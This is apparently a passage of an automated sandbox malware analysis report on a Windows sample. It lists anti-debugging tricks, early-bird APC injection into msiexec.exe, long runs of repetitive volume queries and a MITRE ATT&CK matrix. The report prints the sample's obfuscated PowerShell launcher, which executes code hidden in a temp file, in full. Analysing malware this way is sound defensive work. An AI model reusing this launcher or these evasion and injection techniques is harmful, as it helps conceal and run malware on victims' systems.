Source: svchost.exe, 00000004.00000002.2119521526.0000022FA1E41000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.2118517800.0000022F9C82B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.2119565098.0000022FA1E55000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2123450727.0000000008444000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: msiexec.exe, 0000000B.00000002.2123450727.000000000841A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW(
Source: powershell.exe, 00000001.00000002.1425935127.0000000005DC7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Get-NetEventVmNetworkAdapter

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread information set: HideFromDebugger			Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Early bird code injection technique detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exe

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread APC queued: target process: C:\Windows\SysWOW64\msiexec.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\SysWOW64\msiexec.exe base: 3E40000

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"

Jump to behavior

Source: C:\Users\user\Desktop\qNNwDeb9BY.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$spritapparatets=gc -raw 'c:\users\user\appdata\local\temp\majolicas\protonemata\operationsvrelser\undeliverableness.for';$mindehjtidelighedens=$spritapparatets.substring(69888,3);.$mindehjtidelighedens($spritapparatets)"
Source: C:\Users\user\Desktop\qNNwDeb9BY.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$spritapparatets=gc -raw 'c:\users\user\appdata\local\temp\majolicas\protonemata\operationsvrelser\undeliverableness.for';$mindehjtidelighedens=$spritapparatets.substring(69888,3);.$mindehjtidelighedens($spritapparatets)"			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\qNNwDeb9BY.exe

0_2_004036D7

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 Access Token Manipulation	11 Masquerading	OS Credential Dumping	121 Security Software Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	311 Process Injection	141 Virtualization/Sandbox Evasion	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	1 Clipboard Data	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Access Token Manipulation	Security Account Manager	141 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
